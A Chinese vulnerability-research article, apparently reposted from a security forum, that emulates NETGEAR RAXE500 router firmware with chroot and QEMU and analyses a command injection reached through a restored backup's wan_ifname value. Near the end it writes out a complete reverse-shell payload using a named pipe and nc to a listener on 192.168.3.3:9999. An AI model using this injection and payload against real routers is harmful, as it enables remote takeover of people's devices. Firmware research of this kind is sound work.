文章总结: 文章详述如何搭建NETGEARRAXE500固件模拟环境并发现一处命令注入漏洞:通过binwalk解压固件,用chroot+QEMU启动httpd,解决共享内存、证书、NVRAM依赖后,利用backup功能写入恶意wan_ifname,最终在访问IPV6_disable.cgi时触发system调用获得反弹shell,给出完整复现步骤与代码示例。 综合评分: 87 文章分类: 漏洞分析,IoT安全,安全工具,实战经验
NETGEAR 路由器环境模拟与漏洞分析
易之生生 易之生生
看雪学苑
2026年1月20日 17:59 上海
01
环境配置
版本 :Nighthawk AX12 RAXE500 V1.2.14.114_2.0.67
首先 binwalk -e1 RAXE500-V1.2.14.114_2.0.67.chk 解压固件。
# binwalk -e1 RAXE500-V1.2.14.114_2.0.67.chk
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
58 0x3A Flattened device tree, size:969 bytes, version:17
1030 0x406 Flattened device tree, size:9970 bytes, version:17
42870 0xA776 CRC32 polynomial table, little endian
703534 0xABC2E CRC32 polynomial table, little endian
WARNING:Extractor.execute failed to run external extractor 'lzop -f -d '%e'': [Errno 2] No such file or directory:'lzop', 'lzop -f -d '%e'' might not be installed correctly
761969 0xBA071 LZO compressed data
836250 0xCC29A HTML document header
836500 0xCC394 HTML document footer
836532 0xCC3B4 HTML document header
837187 0xCC643 HTML document footer
837211 0xCC65B HTML document header
838626 0xCCBE2 HTML document footer
838650 0xCCBFA HTML document header
839246 0xCCE4E HTML document footer
957782 0xE9D56 Flattened device tree, size:5913 bytes, version:17
963698 0xEB472 LZMA compressed data, properties:0x5D, dictionary size:8388608 bytes, uncompressed size:-1 bytes
4587594 0x46004A Flattened device tree, size:49513 bytes, version:17
4637110 0x46C1B6 Flattened device tree, size:49513 bytes, version:17
4686626 0x478322 Flattened device tree, size:47694 bytes, version:17
4734322 0x483D72 Flattened device tree, size:50144 bytes, version:17
4784466 0x490152 Flattened device tree, size:50144 bytes, version:17
4834610 0x49C532 Flattened device tree, size:49601 bytes, version:17
4884214 0x4A86F6 Flattened device tree, size:49633 bytes, version:17
4933850 0x4B48DA Flattened device tree, size:49557 bytes, version:17
4983410 0x4C0A72 Flattened device tree, size:49677 bytes, version:17
5033090 0x4CCC82 Flattened device tree, size:47733 bytes, version:17
5080826 0x4D86FA Flattened device tree, size:48647 bytes, version:17
5129474 0x4E4502 Flattened device tree, size:48802 bytes, version:17
5178278 0x4F03A6 Flattened device tree, size:48802 bytes, version:17
5227082 0x4FC24A Flattened device tree, size:48767 bytes, version:17
5275850 0x5080CA Flattened device tree, size:48767 bytes, version:17
5324618 0x513F4A Flattened device tree, size:48767 bytes, version:17
5373386 0x51FDCA Flattened device tree, size:50605 bytes, version:17
5423994 0x52C37A Flattened device tree, size:50605 bytes, version:17
5474602 0x53892A Flattened device tree, size:50412 bytes, version:17
5525014 0x544E16 Squashfs filesystem, little endian, version 4.0, compression:xz, size:78884152 bytes, 3245 inodes, blocksize:131072 bytes, created:2025-05-16 08:07:54
进入 squashfs-root 目录,运行 sudo chroot . bin/sh 进入固件环境。
# sudo chroot . bin/sh
BusyBox v1.31.1 (2025-05-16 15:16:50 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
# ls -la
drwxrwxrwx 22 1000 1000 4096 May 16 2025 .
drwxrwxrwx 22 1000 1000 4096 May 16 2025 ..
-rw-r--r-- 1 1000 1000 0 May 16 2025 .init_enable_core
drwxr-xr-x 2 1000 1000 4096 May 16 2025 bin
drwxrwxr-x 3 1000 1000 4096 May 16 2025 data
lrwxrwxrwx 1 1000 1000 16 May 16 2025 debug -> sys/kernel/debug
drwxrwxr-x 3 1000 1000 4096 May 16 2025 dev
drwxr-xr-x 20 1000 1000 4096 May 16 2025 etc
drwxrwxr-x 3 1000 1000 4096 May 16 2025 home
drwxrwxr-x 2 1000 1000 4096 May 16 2025 include
drwxrwxr-x 6 1000 1000 20480 May 16 2025 lib
drwxrwxr-x 3 1000 1000 4096 May 16 2025 lib64
drwxr-xr-x 2 1000 1000 4096 May 16 2025 misc2
drwxr-xr-x 2 1000 1000 4096 May 16 2025 misc3
drwxrwxr-x 2 1000 1000 4096 May 16 2025 mnt
drwxrwxr-x 9 1000 1000 4096 May 16 2025 opt
drwxrwxr-x 2 1000 1000 4096 May 16 2025 proc
drwxr-xr-x 2 1000 1000 4096 May 16 2025 sbin
drwxr-xr-x 6 1000 1000 4096 May 16 2025 share
drwxrwxr-x 3 1000 1000 4096 May 16 2025 sys
lrwxrwxrwx 1 1000 1000 8 May 16 2025 tmp -> /var/tmp
drwxr-xr-x 10 1000 1000 4096 May 16 2025 usr
drwxrwxr-x 2 1000 1000 4096 May 16 2025 var
drwxrwxr-x 3 1000 1000 4096 May 16 2025 webs
drwxr-xr-x 11 1000 1000 32768 May 16 2025 www
#
直接运行 usr/sbin/httpd 报错,需要根据 etc/init.d/mount-fs.sh 的脚本命令创建目录运行环境。
# usr/sbin/httpd
libacos_debug_log build time:Feb 17 2022 18:15:22
****shared_debug_log_init(82): Open shm for shm httpd_httpd_mt fail, create it.
libhttpd build time:Jan 11 2024 09:55:00
/tmp/shm_id opened error!
创建目录环境命令:
# mkdir -p /var/log /var/run /var/state/dhcp /var/ppp /var/udhcpd /var/zebra /var/siproxd /var/cache /var/tmp /var/samba /var/samba/share /var/samba/homes /var/samba/private /var/samba/locks
再次运行报错,需要将 /tmp/shm_id 的值修改为0:
# usr/sbin/httpd
libacos_debug_log build time:Feb 17 2022 18:15:22
****shared_debug_log_init(82): Open shm for shm httpd_httpd_mt fail, create it.
libhttpd build time:Jan 11 2024 09:55:00
segment_id:5 , in /tmp/shm_id.
Get a incorrect Segment_ID:5 and semaphore ID:-1
something wrong in getting shm_id.
之后再次运行报错:
# usr/sbin/httpd
libacos_debug_log build time: Feb 17 2022 18:15:22
****shared_debug_log_init(82): Open shm for shm httpd_httpd_mt fail, create it.
libhttpd build time: Jan 11 2024 09:55:00
segment_id: 0 , in /tmp/shm_id.
Get a correct Segment_ID: 0 and semaphore ID:0
Can't find handler for ASP command: wlg_cgi_get_isolation_status(0);
Can't find handler for ASP command: wlg_cgi_get_isolation_status(1);
Can't find handler for ASP command: wlg_cgi_get_isolation_status(2);
Can't find handler for ASP command: genie_cgi_need_to_load_basic();
Can't find handler for ASP command: guiCgiInternetStatusGetParam_XUNYOU();
Can't find handler for ASP command: basic_cgi_get_cur_choice_nvram("wan_proto");
Can't find handler for ASP command: eco_get_redirect_link();
Can't find handler for ASP command: attached_devices_cgi_edit_name("ip")
Can't find handler for ASP command: attached_devices_cgi_edit_name("mac")
Can't find handler for ASP command: attached_devices_cgi_edit_name("model")
Can't find handler for ASP command: attached_devices_cgi_edit_name("name")
Can't find handler for ASP command: attached_devices_cgi_edit_name("type")
Can't find handler for ASP command: attached_devices_cgi_edit_name("conndevice")
Can't find handler for ASP command: wlg_cgi_get_isolation_status();
Can't find handler for ASP command: qos_cgi_get_bandwidth("ToSet_qos_bw_uplink");
Can't find handler for ASP command: qos_cgi_support_qos_down_streaming();
Can't find handler for ASP command: qos_cgi_get_bandwidth("AlertMessage");
Can't find handler for ASP command: qos_cgi_get_bandwidth();
Can't find handler for ASP command: qos_cgi_get_mac();
Can't find handler for ASP command: qos_cgi_get_custom_table();
Can't find handler for ASP command: qos_cgi_get_custom_hidden_table();
Can't find handler for ASP command: cdl_cgi_set_hijack(1);
Can't find handler for ASP command: genie_cgi_get_client_type();
Can't find handler for ASP command: 13
Can't find handler for ASP command: wlh_cgi_get_5g2presetssid();
Can't find handler for ASP command: genie_get_5g_2_wireless_security_key();
Can't find handler for ASP command: cdl_cgi_set_hijack(0);
Can't find handler for ASP command: check_is_index()
Can't find handler for ASP command: gui_get_opmode_param("pre_mode");
Can't find handler for ASP command: isPortTrunking("is_ptk_start");
Can't find handler for ASP command: isPortTrunking("is_ptk_end");
# can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
dil init
is_no_boarddata():can't open file /misc2/.bd_data
add active user:, sessionId:0x0, cookie:0
usr/sbin/httpd(pid=4777) is calling shared_acos_nvram_commit:
httpd: socket bound in 255.255.255.255:9443.
httpd: ipv6 socket bound in 80.
Can't open device file: /dev/spiv6
qemu: uncaught target signal 11 (Segmentation fault) - core dumped
#
02
证书配置
GDB 调试发现 tmp_h_c 的值为空,代码如下:
分析代码,需要添加启动参数: /usr/sbin/httpd -E /usr/sbin/ca.pem /usr/sbin/httpsd.pem
再次运行提示生成证书失败:
# /usr/sbin/httpd -E /usr/sbin/ca.pem /usr/sbin/httpsd.pem
libacos_debug_log build time:Feb 17 2022 18:15:22
****shared_debug_log_init(82): Open shm for shm httpd_httpd_mt fail, create it.
libhttpd build time:Jan 11 2024 09:55:00
Generating a RSA private key
Error Generating Key
1082140528:error:0E06D06C:lib(14):func(109):reason(108):NA:0:group=req name=default_bits
1082140528:error:2406C06E:lib(36):func(108):reason(110):NA:0:
1082140528:error:2406C06E:lib(36):func(108):reason(110):NA:0:
1082140528:error:2406B072:lib(36):func(107):reason(114):NA:0:
1082140528:error:2406C06E:lib(36):func(108):reason(110):NA:0:
1082140528:error:2406C06E:lib(36):func(108):reason(110):NA:0:
1082140528:error:2406B072:lib(36):func(107):reason(114):NA:0:
1082140528:error:2406C06E:lib(36):func(108):reason(110):NA:0:
1082140528:error:2406B072:lib(36):func(107):reason(114):NA:0:
1082140528:error:04081003:lib(4):func(129):reason(3):NA:0:
查看 /dev/ 下的设备,因为没有 /dev/random 和 /dev/urandom 导致熵不足引起的,需要将主机的 dev 设备映射到固件目录:
# sudo mount -o bind /dev ./dev/
再次运行就成功了
# /usr/sbin/httpd -E /usr/sbin/ca.pem /usr/sbin/httpsd.pem
libacos_debug_log build time: Feb 17 2022 18:15:22
libhttpd build time: Jan 11 2024 09:55:00
Generating a RSA private key
................................................+++++
..............+++++
writing new private key to '/tmp/h.k'
-----
read_board_data():can't open file /misc2/.bd_data
read_board_data():can't open file /misc2/.bd_data
read_board_data():can't open file /misc2/.bd_data
/usr/sbin/httpd(pid=5128) is calling shared_acos_nvram_commit:
segment_id: 0 , in /tmp/shm_id.
Get a correct Segment_ID: 0 and semaphore ID:0
Can't find handler for ASP command: wlg_cgi_get_isolation_status(0);
Can't find handler for ASP command: wlg_cgi_get_isolation_status(1);
Can't find handler for ASP command: wlg_cgi_get_isolation_status(2);
Can't find handler for ASP command: genie_cgi_need_to_load_basic();
Can't find handler for ASP command: guiCgiInternetStatusGetParam_XUNYOU();
Can't find handler for ASP command: basic_cgi_get_cur_choice_nvram("wan_proto");
Can't find handler for ASP command: eco_get_redirect_link();
Can't find handler for ASP command: attached_devices_cgi_edit_name("ip")
Can't find handler for ASP command: attached_devices_cgi_edit_name("mac")
Can't find handler for ASP command: attached_devices_cgi_edit_name("model")
Can't find handler for ASP command: attached_devices_cgi_edit_name("name")
Can't find handler for ASP command: attached_devices_cgi_edit_name("type")
Can't find handler for ASP command: attached_devices_cgi_edit_name("conndevice")
Can't find handler for ASP command: wlg_cgi_get_isolation_status();
Can't find handler for ASP command: qos_cgi_get_bandwidth("ToSet_qos_bw_uplink");
Can't find handler for ASP command: qos_cgi_support_qos_down_streaming();
Can't find handler for ASP command: qos_cgi_get_bandwidth("AlertMessage");
Can't find handler for ASP command: qos_cgi_get_bandwidth();
Can't find handler for ASP command: qos_cgi_get_mac();
Can't find handler for ASP command: qos_cgi_get_custom_table();
Can't find handler for ASP command: qos_cgi_get_custom_hidden_table();
Can't find handler for ASP command: cdl_cgi_set_hijack(1);
Can't find handler for ASP command: genie_cgi_get_client_type();
Can't find handler for ASP command: 13
Can't find handler for ASP command: wlh_cgi_get_5g2presetssid();
Can't find handler for ASP command: genie_get_5g_2_wireless_security_key();
Can't find handler for ASP command: cdl_cgi_set_hijack(0);
Can't find handler for ASP command: check_is_index()
Can't find handler for ASP command: gui_get_opmode_param("pre_mode");
Can't find handler for ASP command: isPortTrunking("is_ptk_start");
Can't find handler for ASP command: isPortTrunking("is_ptk_end");
# can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
can't open mtd file!!
dil init
is_no_boarddata():can't open file /misc2/.bd_data
add active user:, sessionId:0x0, cookie:0
/usr/sbin/httpd(pid=5145) is calling shared_acos_nvram_commit:
httpd: socket bound in 255.255.255.255:9443.
httpd: ipv6 socket bound in 80.
Can't open device file: /dev/spiv6
cert file /tmp/h.c, key file /tmp/h.k
>>> start to launch lighttpd
killall: lighttpd: no process killed
2025-12-12 08:00:39: (network.c.578) bind() 0.0.0.0:443: Address already in use
#
03
NVRAM模拟
虽然 HTTPD 的服务运行成功了,但是网页无法访问,访问的提示如下:
is_no_boarddata():can't open file /misc2/.bd_data
add active user:, sessionId:0x0, cookie:0
/usr/sbin/httpd(pid=5145) is calling shared_acos_nvram_commit:
httpd: socket bound in 255.255.255.255:9443.
httpd: ipv6 socket bound in 80.
Can't open device file: /dev/spiv6
cert file /tmp/h.c, key file /tmp/h.k
>>> start to launch lighttpd
killall: lighttpd: no process killed
2025-12-12 08:00:39: (network.c.578) bind() 0.0.0.0:443: Address already in use
===> parse_http_request(3103) isToRouter = 0:return
===> parse_http_request(3103) isToRouter = 0:return
===> parse_http_request(3103) isToRouter = 0:return
===> parse_http_request(3103) isToRouter = 0:return
===> parse_http_request(3103) isToRouter = 0:return
===> parse_http_request(3103) isToRouter = 0:return
===> parse_http_request(3103) isToRouter = 0:return
===> parse_http_request(3103) isToRouter = 0:return
===> parse_http_request(3103) isToRouter = 0:return
===> parse_http_request(3103) isToRouter = 0:return
对应的代码如下:
需要从 NVRAM 读取 ddns_hostname 的值,现在需要一个 nvram.ini 文件,和一个模拟 acosNvramConfig_* 的 SO。
在 GITHUB 上有一个 libnvram_faker/conf/netgear/nvram.ini 的配置文件,然后通过 HOOK 来模拟以下的函数:
HOOK acosNvramConfig 的 acosNvramConfig.c 代码如下:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <stdbool.h>
#include <errno.h>
// 假设配置文件路径
#define ROUTE_CONFIG_PATH "/tmp/route.cfg"
#define MAX_LINE_LENGTH 256
#define MAX_KEY_LENGTH 64
#define MAX_VALUE_LENGTH 128
// 函数声明
char *nvm_get_value(constchar *key);
char *nvm_get_value_no_alloc(constchar *key, char *buffer, size_t buffer_size);
代码太长,省略...
/tmp/route.cfg 的配置文件如下:
fw_spi=1
usb_info_dev7=A200396E0402FF83@[email protected]@U@1@USB_Storage;U:;0;0@
http_server_wan_enable=0
wifi_mac12=62:c0:02:11:22:33
wan_fix_dns=0
wifi_wep_on12=0
usb_info_dev83=A200396E0402FF83@[email protected]@U@1@USB_Storage;U:;0;0@
wifi_auth_type3=3
wan_iptype=Dynamic
usb_info_dev8=A200396E0402FF83@[email protected]@U@1@USB_Storage;U:;0;0@
usb_info_dev63=A200396E0402FF83@[email protected]@U@1@USB_Storage;U:;0;0@
wifi_ssid4=NETGEAR_Guest3
代码太多,省略...
编译为 acosNvramConfig.so 后放到 lib 目录:
# arm-linux-gnueabi-gcc -shared -fPIC acosNvramConfig.c -o acosNvramConfig.so -ldl
需要更新 route.cfg,将 lan_ipaddr=192.168.1.1 修改为本机地址 127.0.0.1,然后运行以下命令:
# LD_PRELOAD=acosNvramConfig.so /usr/sbin/httpd -E /usr/sbin/ca.pem /usr/sbin/httpsd.pem
访问 http://127.0.0.1/ 提示以下错误:
Device is not authorizied!
报错代码如下:
dword_1439FA4 的值来自 is_authorizied() 函数:
is_authorizied 函数在 libacos_nvram.so 中,代码如下:
功能是取 NVRAM 的 board_id 来与 U12H449 等做比较,搜索 U12H449 选择 U12H449T00_NETGEAR 做为 board_id:
更新 route.cfg 增加 board_id=U12H449T00_NETGEAR 后,访问 http://127.0.0.1/start.htm 成功,但是有时候出现不明原因的 (Segmentation fault) – core dumped:
#
04
漏洞分析
在访问 ipv6_disable.cgi 时,有如下的代码:
v11 = (constchar *)acosNvramConfig_get((int)"wan_ifname");
snprintf(s, 0x80u, "ifconfig %s mtu %d", v11, v9);
system(s);
从 NVRAM 中读取了 wan_ifname 的值做为 system 的参数:
而 wan_ifname 的值可以通过 https://127.0.0.1/BAK_backup.htm 恢复备份文件的功能来设置:
上传文件代码如下:
libacos_nvram.so 的 shared_acos_nvram_restore_configuration 代码如下:
恢复配置代码只是一个简单的 CP。
修改 route.cfg 文件的 wan_ifname=eth0&rm /tmp/f 2>/dev/null; mknod /tmp/f p; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.3.3 9999 > /tmp/f& 进行测试,
打开监听端口9999:
# nc -lvvp 9999
Listening on 0.0.0.0 9999
打开 https://127.0.0.1/IPV6_disable.htm 页面 , 点击 Apply 按钮 , 就获取到了反弹SHELL:
#
#
看雪ID:易之生生
https://bbs.kanxue.com/user-home-920134.htm
*本文为看雪论坛精华文章,由 易之生生 原创,转载请注明来自看雪社区
往期推荐
逆向分析某手游基于异常的内存保护
解决Il2cppapi混淆,通杀DumpUnityCs文件
记录一次Unity加固的探索与实现
DLINK路由器命令注入漏洞从1DAY到0DAY
量子安全 quantum ctf Global Hyperlink Zone Hack the box
球分享
球点赞
球在看
点击阅读原文查看更多
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:看雪学苑 易之生生 易之生生《NETGEAR 路由器环境模拟与漏洞分析》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论